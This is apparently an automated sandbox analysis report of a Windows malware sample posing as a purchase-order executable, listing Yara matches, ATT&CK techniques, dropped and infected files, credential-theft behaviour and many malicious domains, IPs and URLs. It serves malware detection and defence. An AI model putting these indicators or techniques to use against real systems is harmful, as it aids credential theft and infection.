                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                          Native API
                          2
                          LSASS Driver
                          1
                          Abuse Elevation Control Mechanism
                          11
                          Disable or Modify Tools
                          1
                          OS Credential Dumping
                          1
                          System Time Discovery
                          1
                          Taint Shared Content
                          11
                          Archive Collected Data
                          3
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Scheduled Task/Job
                          1
                          DLL Side-Loading
                          2
                          LSASS Driver
                          11
                          Deobfuscate/Decode Files or Information
                          111
                          Input Capture
                          1
                          Account Discovery
                          Remote Desktop Protocol1
                          Data from Local System
                          21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Service Execution
                          1
                          Windows Service
                          1
                          DLL Side-Loading
                          1
                          Abuse Elevation Control Mechanism
                          Security Account Manager2
                          File and Directory Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          4
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron1
                          Scheduled Task/Job
                          1
                          Windows Service
                          4
                          Obfuscated Files or Information
                          NTDS24
                          System Information Discovery
                          Distributed Component Object Model1
                          Email Collection
                          15
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchd2
                          Registry Run Keys / Startup Folder
                          11
                          Process Injection
                          1
                          Direct Volume Access
                          LSA Secrets131
                          Security Software Discovery
                          SSH111
                          Input Capture
                          Fallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                          Scheduled Task/Job
                          12
                          Software Packing
                          Cached Domain Credentials31
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                          Registry Run Keys / Startup Folder
                          1
                          Timestomp
                          DCSync2
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading
                          Proc Filesystem1
                          Application Window Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                          Masquerading
                          /etc/passwd and /etc/shadow1
                          System Owner/User Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                          Virtualization/Sandbox Evasion
                          Network Sniffing1
                          System Network Configuration Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                          Process Injection
                          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582674 Sample: PO_2024_056209_MQ04865_ENQ_... Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 102 reallyfreegeoip.org 2->102 104 ww7.przvgke.biz 2->104 106 35 other IPs or domains 2->106 120 Suricata IDS alerts for network traffic 2->120 122 Found malware configuration 2->122 124 Malicious sample detected (through community Yara rule) 2->124 128 20 other signatures 2->128 10 alg.exe 2->10         started        15 PO_2024_056209_MQ04865_ENQ_1045.exe 7 2->15         started        17 zeXKjViL.exe 2->17         started        19 8 other processes 2->19 signatures3 126 Tries to detect the country of the analysis system (by using the IP) 102->126 process4 dnsIp5 110 yunalwv.biz 208.117.43.225, 49853, 49916, 80 STEADFASTUS United States 10->110 112 przvgke.biz 72.52.178.23, 49746, 49757, 49827 LIQUIDWEBUS United States 10->112 114 13 other IPs or domains 10->114 84 C:\Program Files\...\updater.exe, PE32+ 10->84 dropped 86 C:\Program Files\...\private_browsing.exe, PE32+ 10->86 dropped 88 C:\Program Files\...\plugin-container.exe, PE32+ 10->88 dropped 98 120 other malicious files 10->98 dropped 148 Creates files in the system32 config directory 10->148 150 Writes data at the end of the disk (often used by bootkits to hide malicious code) 10->150 152 Drops executable to a common third party application directory 10->152 154 Infects executable files (exe, dll, sys, html) 10->154 90 C:\Users\user\AppData\Roaming\zeXKjViL.exe, PE32 15->90 dropped 92 C:\Users\...\zeXKjViL.exe:Zone.Identifier, ASCII 15->92 dropped 100 2 other malicious files 15->100 dropped 156 Uses schtasks.exe or at.exe to add and modify task schedules 15->156 158 Adds a directory exclusion to Windows Defender 15->158 21 PO_2024_056209_MQ04865_ENQ_1045.exe 6 15->21         started        26 powershell.exe 23 15->26         started        28 powershell.exe 23 15->28         started        30 schtasks.exe 1 15->30         started        94 C:\Users\user\AppData\Local\...\tmp6E4E.tmp, XML 17->94 dropped 96 C:\Users\user\AppData\...\zeXKjViL.exe.log, ASCII 17->96 dropped 32 schtasks.exe 17->32         started        34 zeXKjViL.exe 17->34         started        36 zeXKjViL.exe 17->36         started        160 Contains functionality to behave differently if execute on a Russian/Kazak computer 19->160 162 Found direct / indirect Syscall (likely to bypass EDR) 19->162 file6 signatures7 process8 dnsIp9 108 cvgrf.biz 54.244.188.177, 49738, 49739, 49744 AMAZON-02US United States 21->108 64 C:\Windows\System32\alg.exe, PE32+ 21->64 dropped 66 C:\Windows\System32\FXSSVC.exe, PE32+ 21->66 dropped 68 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 21->68 dropped 76 5 other malicious files 21->76 dropped 132 Writes data at the end of the disk (often used by bootkits to hide malicious code) 21->132 134 Drops executable to a common third party application directory 21->134 136 Infects executable files (exe, dll, sys, html) 21->136 38 Trading_AIBot.exe 21->38         started        42 Microsofts.exe 21->42         started        70 C:\...\__PSScriptPolicyTest_zccguk4f.xmq.ps1, ASCII 26->70 dropped 78 4 other malicious files 26->78 dropped 138 Loading BitLocker PowerShell Module 26->138 45 conhost.exe 26->45         started        72 C:\...\__PSScriptPolicyTest_xvfd5szs.lt0.psm1, ASCII 28->72 dropped 74 C:\...\__PSScriptPolicyTest_xbjhbjfb.ggs.ps1, ASCII 28->74 dropped 80 2 other malicious files 28->80 dropped 47 conhost.exe 28->47         started        49 conhost.exe 30->49         started        51 conhost.exe 32->51         started        file10 signatures11 process12 dnsIp13 82 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 38->82 dropped 140 Drops large PE files 38->140 142 Adds a directory exclusion to Windows Defender 38->142 53 powershell.exe 38->53         started        56 schtasks.exe 38->56         started        58 apihost.exe 38->58         started        116 checkip.dyndns.com 132.226.8.169, 49741, 80 UTMEMUS United States 42->116 118 reallyfreegeoip.org 188.114.96.3, 443, 49752 CLOUDFLARENETUS European Union 42->118 144 Tries to steal Mail credentials (via file / registry access) 42->144 146 Tries to harvest and steal browser information (history, passwords, etc) 42->146 file14 signatures15 process16 signatures17 130 Loading BitLocker PowerShell Module 53->130 60 conhost.exe 53->60         started        62 conhost.exe 56->62         started        process18

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          PO_2024_056209_MQ04865_ENQ_1045.exe42%ReversingLabsWin32.Trojan.Mailer
                          PO_2024_056209_MQ04865_ENQ_1045.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%Joe Sandbox ML
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://208.117.43.225/gs0%Avira URL Cloudsafe
                          http://54.244.188.177/haobwbcukjixeEK0%Avira URL Cloudsafe
                          http://208.117.43.225:80/pcyutdnis0%Avira URL Cloudsafe
                          http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-100%Avira URL Cloudmalware
                          http://72.52.178.23/8N0%Avira URL Cloudsafe
                          http://54.244.188.177/vcdhvtdni4/0%Avira URL Cloudsafe
                          http://208.117.43.225/pW0%Avira URL Cloudsafe
                          http://208.117.43.225/rbdfcj0%Avira URL Cloudsafe
                          http://34.227.7.138/0%Avira URL Cloudsafe
                          http://18.246.231.120/0%Avira URL Cloudsafe
                          http://208.117.43.225/pcyu0%Avira URL Cloudsafe
                          http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153100%Avira URL Cloudmalware
                          http://54.244.188.177/00%Avira URL Cloudsafe
                          http://72.52.178.23:80/ewlG0%Avira URL Cloudsafe
                          http://44.221.84.105/tloalmkxssnuris0%Avira URL Cloudsafe
                          http://13.251.16.150/kcogybxqholgdpl0u0umF0%Avira URL Cloudsafe
                          http://82.112.184.197/yrkakyyuj0%Avira URL Cloudsafe
                          http://18.246.231.120/kwsxhlpkribwfg0%Avira URL Cloudsafe
                          http://schemas.microsoft.co0%Avira URL Cloudsafe
                          http://54.244.188.177/mshapsve0%Avira URL Cloudsafe
                          http://44.221.84.105/0%Avira URL Cloudsafe
                          http://54.244.188.177/6noh0%Avira URL Cloudsafe
                          http://54.244.188.177/mshapsvejF0%Avira URL Cloudsafe
                          http://13.251.16.150:80/kcogybxqholgdplrobat0%Avira URL Cloudsafe
                          http://18.141.10.107/snkwxvqngvs_0%Avira URL Cloudsafe
                          http://47.129.31.212/ld0%Avira URL Cloudsafe
                          http://13.251.16.150/kcogybxqholgdpl0%Avira URL Cloudsafe
                          http://208.117.43.225/rbdfcjngs30%Avira URL Cloudsafe
                          http://82.112.184.197:80/yrkakyyuj0%Avira URL Cloudsafe
                          http://ww7.fwiwk.biz/m?usid=27&utid=10221880067100%Avira URL Cloudphishing
                          http://72.52.178.23/yN0%Avira URL Cloudsafe
                          http://18.246.231.120/kwsxhlpkribwfgiG0%Avira URL Cloudsafe
                          http://54.244.188.177:80/vcdhvtdnis0%Avira URL Cloudsafe
                          http://208.117.43.225/s0%Avira URL Cloudsafe
                          http://72.52.178.23/~N0%Avira URL Cloudsafe
                          http://72.52.178.23:80/mt00%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          76899.bodis.com
                          199.59.243.227
                          truefalse
                            high
                            oshhkdluh.biz
                            54.244.188.177
                            truefalse
                              high
                              jpskm.biz
                              18.246.231.120
                              truefalse
                                high
                                vjaxhpbji.biz
                                82.112.184.197
                                truefalse
                                  high
                                  pywolwnvd.biz
                                  54.244.188.177
                                  truefalse
                                    high
                                    ifsaia.biz
                                    13.251.16.150
                                    truefalse
                                      high
                                      ytctnunms.biz
                                      3.94.10.34
                                      truefalse
                                        high
                                        lrxdmhrr.biz
                                        54.244.188.177
                                        truefalse
                                          high
                                          tbjrpv.biz
                                          34.246.200.160
                                          truefalse
                                            high
                                            saytjshyf.biz
                                            44.221.84.105
                                            truefalse
                                              high
                                              084725.parkingcrew.net
                                              13.248.148.254
                                              truefalse
                                                high
                                                xlfhhhm.biz
                                                47.129.31.212
                                                truefalse
                                                  high
                                                  fwiwk.biz
                                                  72.52.178.23
                                                  truefalse
                                                    high
                                                    npukfztj.biz
                                                    44.221.84.105
                                                    truefalse
                                                      high
                                                      przvgke.biz
                                                      72.52.178.23
                                                      truefalse
                                                        high
                                                        dwrqljrr.biz
                                                        54.244.188.177
                                                        truefalse
                                                          high
                                                          myups.biz
                                                          165.160.13.20
                                                          truefalse
                                                            high
                                                            gytujflc.biz
                                                            208.117.43.225
                                                            truefalse
                                                              high
                                                              ssbzmoy.biz
                                                              18.141.10.107
                                                              truefalse
                                                                high
                                                                knjghuig.biz
                                                                18.141.10.107
                                                                truefalse
                                                                  high
                                                                  yunalwv.biz
                                                                  208.117.43.225
                                                                  truefalse
                                                                    high
                                                                    reallyfreegeoip.org
                                                                    188.114.96.3
                                                                    truefalse
                                                                      high
                                                                      deoci.biz
                                                                      34.227.7.138
                                                                      truefalse
                                                                        high
                                                                        checkip.dyndns.com
                                                                        132.226.8.169
                                                                        truefalse
                                                                          high
                                                                          nqwjmb.biz
                                                                          35.164.78.200
                                                                          truefalse
                                                                            high
                                                                            cvgrf.biz
                                                                            54.244.188.177
                                                                            truefalse
                                                                              high
                                                                              qaynky.biz
                                                                              13.251.16.150
                                                                              truefalse
                                                                                high
                                                                                lpuegx.biz
                                                                                82.112.184.197
                                                                                truefalse
                                                                                  high
                                                                                  bumxkqgxu.biz
                                                                                  44.221.84.105
                                                                                  truefalse
                                                                                    high
                                                                                    vcddkls.biz
                                                                                    18.141.10.107
                                                                                    truefalse
                                                                                      high
                                                                                      checkip.dyndns.org
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        uhxqin.biz
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          high
                                                                                          anpmnmxo.biz
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            ww7.przvgke.biz
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              ww7.fwiwk.biz
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                zlenh.biz
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  ww12.przvgke.biz
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                                    http://bumxkqgxu.biz/vnlfrtbjmfalse
                                                                                                      high
                                                                                                      https://reallyfreegeoip.org/xml/8.46.123.189false
                                                                                                        high
                                                                                                        http://lpuegx.biz/yrkakyyujfalse
                                                                                                          high
                                                                                                          http://yunalwv.biz/pjpssoyxmlcfalse
                                                                                                            high
                                                                                                            http://lrxdmhrr.biz/fncvigkebknfalse
                                                                                                              high
                                                                                                              http://dwrqljrr.biz/lcaecfwoxcmbfalse
                                                                                                                high
                                                                                                                http://myups.biz/lfalse
                                                                                                                  high
                                                                                                                  http://ifsaia.biz/kcogybxqholgdplfalse
                                                                                                                    high
                                                                                                                    http://checkip.dyndns.org/false
                                                                                                                      high
                                                                                                                      http://lrxdmhrr.biz/lutwptrdxtxhfalse
                                                                                                                        high
                                                                                                                        http://ssbzmoy.biz/mmfoishfalse
                                                                                                                          high
                                                                                                                          http://deoci.biz/lgyfufalse
                                                                                                                            high
                                                                                                                            http://vcddkls.biz/wefalse
                                                                                                                              high
                                                                                                                              http://qaynky.biz/rssfalse
                                                                                                                                high
                                                                                                                                http://xlfhhhm.biz/ldfalse
                                                                                                                                  high
                                                                                                                                  http://npukfztj.biz/bufnddtlfalse
                                                                                                                                    high
                                                                                                                                    http://gytujflc.biz/rbdfcjfalse
                                                                                                                                      high
                                                                                                                                      http://tbjrpv.biz/bilswyfalse
                                                                                                                                        high
                                                                                                                                        http://fwiwk.biz/mtfalse
                                                                                                                                          high
                                                                                                                                          http://vjaxhpbji.biz/msfalse
                                                                                                                                            high
                                                                                                                                            http://oshhkdluh.biz/vcdhvtdnifalse
                                                                                                                                              high
                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                              http://34.227.7.138/alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://208.117.43.225/pWalg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://72.52.178.23/8NzeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://54.244.188.177/vcdhvtdni4/alg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://208.117.43.225/gsalg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://reallyfreegeoip.orgdMicrosofts.exe, 00000013.00000002.2962626553.00000000025AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://54.244.188.177/haobwbcukjixeEKPO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1804169295.0000000006A0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://208.117.43.225/rbdfcjalg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2404953266.0000000000567000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042802989.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2042471889.00000000005DF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  http://208.117.43.225:80/pcyutdnisalg.exe, 0000000B.00000003.2509027263.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.fontbureau.com/designersPO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
